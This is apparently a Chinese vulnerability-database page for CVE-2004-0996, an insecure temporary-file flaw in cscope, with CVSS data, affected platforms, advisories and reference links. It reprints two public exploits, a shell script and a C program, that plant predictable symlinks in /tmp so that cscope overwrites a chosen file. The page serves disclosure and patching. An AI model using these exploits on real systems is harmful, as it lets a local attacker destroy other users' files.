CVE-2004-0996
CVSS2.1
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:50:33
NMCOEPS    

[原文]main.c in cscope 15-4 and 15-5 creates temporary files with predictable filenames, which allows local users to overwrite arbitrary files via a symlink attack.


[CNNVD]Cscope main.c 文件覆盖漏洞(CNNVD-200501-203)

        Cscope是一个开源的文本模式浏览器。
        Cscope 15-4及15-5中main.c由于设计问题,存在任意文件覆盖漏洞。
        由于main.c在创见临时文件时采用可预测的文件名,本地用户可以利用此漏洞,采用链接方式,对任意文件进行覆盖。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:gentoo:linuxGentoo Linux
cpe:/o:debian:debian_linux:3.0::ia-32
cpe:/o:debian:debian_linux:3.0::ppc
cpe:/o:debian:debian_linux:3.0::arm
cpe:/o:debian:debian_linux:3.0::mipsel
cpe:/a:cscope:cscope:15.3
cpe:/o:debian:debian_linux:3.0::hppa
cpe:/a:cscope:cscope:15.4
cpe:/a:cscope:cscope:15.5
cpe:/o:debian:debian_linux:3.0::ia-64
cpe:/o:debian:debian_linux:3.0::mips
cpe:/a:cscope:cscope:13.0
cpe:/o:sco:unixware:7.1.1
cpe:/o:debian:debian_linux:3.0::alpha
cpe:/o:sco:unixware:7.1.3
cpe:/a:cscope:cscope:15.1
cpe:/o:debian:debian_linux:3.0::m68k
cpe:/o:sco:unixware:7.1.4
cpe:/o:debian:debian_linux:3.0::sparc
cpe:/o:debian:debian_linux:3.0Debian Debian Linux 3.0
cpe:/o:debian:debian_linux:3.0::s-390

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0996
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0996
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-203
(官方数据源) CNNVD

- 其它链接及资源

http://docs.info.apple.com/article.html?artnum=306172
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=306172
http://lists.apple.com/archives/security-announce//2007/Jul/msg00004.html
(UNKNOWN)  APPLE  APPLE-SA-2007-07-31
http://marc.info/?l=bugtraq&m=110133485519690&w=2
(UNKNOWN)  BUGTRAQ  20041124 STG Security Advisory: [SSA-20041122-09] cscope insecure temp file creation vulnerability
http://www.debian.org/security/2004/dsa-610
(VENDOR_ADVISORY)  DEBIAN  DSA-610
http://www.gentoo.org/security/en/glsa/glsa-200412-11.xml
(UNKNOWN)  GENTOO  GLSA-200412-11
http://www.securityfocus.com/archive/1/381443
(UNKNOWN)  BUGTRAQ  20041117 RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/archive/1/381506
(UNKNOWN)  BUGTRAQ  20041118 Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/archive/1/381611
(UNKNOWN)  BUGTRAQ  20041118 Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/bid/11697
(VENDOR_ADVISORY)  BID  11697
http://www.securityfocus.com/bid/25159
(UNKNOWN)  BID  25159
http://www.vupen.com/english/advisories/2007/2732
(UNKNOWN)  VUPEN  ADV-2007-2732
http://xforce.iss.net/xforce/xfdb/18125
(VENDOR_ADVISORY)  XF  cscope-tmp-race-condition(18125)

- 漏洞信息

Cscope main.c 文件覆盖漏洞
低危 设计错误
2005-01-10 00:00:00 2005-10-20 00:00:00
本地  
        Cscope是一个开源的文本模式浏览器。
        Cscope 15-4及15-5中main.c由于设计问题,存在任意文件覆盖漏洞。
        由于main.c在创见临时文件时采用可预测的文件名,本地用户可以利用此漏洞,采用链接方式,对任意文件进行覆盖。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://sourceforge.net/projects/cscope/files/

- 漏洞信息 (24749)

Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1) (EDBID:24749)
linux local
2004-11-17 Verified
0 Gangstuck
N/A [点击下载]
source: http://www.securityfocus.com/bid/11697/info

Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. 

During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it. 

Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application. 

Versions up to and including Cscope 15.5 are reported vulnerable.

#!/bin/sh
#################################################################
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com>
#################################################################

HOWM=30
CURR=`ps | grep ps | awk '{print $1}'`
NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`
LAST=`expr $NEXT + $HOWM`

echo -e "\n--= Cscope Symlink Vulnerability Exploitation =--\n"\
        "                 [versions 15.5 and minor]\n"\
        "                   Gangstuck / Psirac\n"\
        "                 <research@rexotec.com>\n\n"

if [ $# -lt 1 ]; then
        echo "Usage: $0 <file1> [number_of_guesses]"
        exit 1
fi

rm -f /tmp/cscope*

echo "Probed next process id ........ [${NEXT}]"

while [ ! "$NEXT" -eq "$LAST" ]; do
        ln -s $1 /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
        ln -s $1 /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
done

		

- 漏洞信息 (24750)

Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (2) (EDBID:24750)
linux local
2004-11-17 Verified
0 Gangstuck
N/A [点击下载]
source: http://www.securityfocus.com/bid/11697/info
 
Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it.
 
During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it.
 
Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application.
 
Versions up to and including Cscope 15.5 are reported vulnerable.
/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE   64

int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];

        fprintf(stdout, "\n     --[ Cscope Exploit ]--\n"\
                        "     version 15.5 and minor \n" \
                        "       Gangstuck / Psirac\n" \
                        "     <research@rexotec.com>\n\n");

        if (ac != 3) {
                fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
                return 1;
        }

        cur=getpid();
        lst=cur+atoi(av[2]);

        fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
                        " -> Last process id is ........ [%5d]\n", cur, lst);

        while (++cur != lst) {
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
                symlink(av[1], buffer);
        }

        return 0;
}		

- 漏洞信息 (F37095)

SCOSA-2005.11.txt (PacketStormID:F37095)
2005-04-18 00:00:00
 
advisory,local
CVE-2004-0996
[点击下载]

SCO Security Advisory - cscope creates temporary files with an easily predictable file name. A local attacker could exploit this vulnerability and possibly gain elevated privileges on the system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : cscope local attacker can remove arbitrary files
Advisory number: 	SCOSA-2005.11
Issue date: 		2005 April 7
Cross reference:	sr892180 fz530504 erg712739 CAN-2004-0996
______________________________________________________________________________


1. Problem Description

	cscope is a developer's tool for browsing source code.

	cscope creates temporary files with an easily predictable
	file name. A local attacker could exploit this vulnerability
	and possibly gain elevated privileges on the system. 

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
	has assigned the name CAN-2004-0996 to this issue.


2. Vulnerable Supported Versions

	System				Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.6 		/usr/ccs/bin/cscope
	OpenServer 5.0.7		/usr/ccs/bin/cscope 

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.6

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.11

	4.2 Verification

	MD5 (VOL.000.000) = 1fb21699e2a86a2aeb390a57219ff567

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	4.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the directory as the location of the
	images.


5. OpenServer 5.0.7

	5.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.11

	5.2 Verification

	MD5 (VOL.000.000) = 1fb21699e2a86a2aeb390a57219ff567

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the directory as the location of the
	images.


6. References

	Specific references for this advisory:
		http://xforce.iss.net/xforce/xfdb/18125 
		http://www.securityfocus.com/bid/11697 
		http://marc.theaimsgroup.com/?l=bugtraq&m=110133485519690&w=2 
		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0996

	SCO security resources:
		http://www.sco.com/support/security/index.html

	SCO security advisories via email
		http://www.sco.com/support/forums/security.html

	This security fix closes SCO incidents sr892180 fz530504
	erg712739.


7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.


8. Acknowledgments

	SCO would like to thank Gangstuck / Psirac <research@rexotec.com>
	who disclosed this vulnerability. Jeremy Bae from STG
	Security Inc <swbae@stgsecurity.com> also disclosed this
	vulnerability to the vendor.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (SCO/SYSV)

iD8DBQFCVY+taqoBO7ipriERAqV1AJ9efhMnTGgI0X0i+9u69ESgLpF8xgCeI8Jj
e3dYzV4evbTDaDlU3X3QJfw=
=DCWX
-----END PGP SIGNATURE-----    

- 漏洞信息

11919
Cscope Tempfile Symlink Arbitrary File Deletion
Local Access Required Race Condition
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Cscope contains a flaw that may allow a malicious user to predict an upcoming temporary filename and use a symlink attack to cause corruption and removal of arbitrary system files. The product utilizes the directory found in the environment variable "TMPDIR" to store it's temporary files. During creation of these temporary files, cscope adheres to a predictable naming scheme for the filenames and does not check for an existing file by the chosen name. This issue may result in a loss of integrity.

- 时间线

2004-11-08 2003-05-21
2004-11-17 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: -a user setting his/her "TMPDIR" environment variable to a more trusted location such as "~/tmp" should mitigate some risk.

- 相关参考

- 漏洞作者

- 漏洞信息

Cscope Insecure Temporary File Creation Vulnerabilities
Design Error 11697
No Yes
2004-11-17 12:00:00 2007-08-02 05:25:00
Gangstuck / Psirac <research@rexotec.com> disclosed this vulnerability. Jeremy Bae from STG Security Inc <swbae@stgsecurity.com> also disclosed this vulnerability to the vendor.

- 受影响的程序版本

SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Unixware 7.1.1
Gentoo Linux
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Cscope Cscope 15.5
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6
Cscope Cscope 15.4
Cscope Cscope 15.3
Cscope Cscope 15.1
Cscope Cscope 13.0
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.10
Apple Mac OS X 10.3.9

- 漏洞讨论

Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it.

During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it.

Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application.

Versions up to and including Cscope 15.5 are reported vulnerable.

- 漏洞利用

Although an exploit is not required, example programs have been provided:

- 解决方案

Please see the referenced advisories for more information.


Apple Mac OS X 10.3.9

Apple Mac OS X Server 10.3.9

Apple Mac OS X 10.4.10

Apple Mac OS X Server 10.4.10

Cscope Cscope 15.3

SCO Unixware 7.1.1

SCO Unixware 7.1.3

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站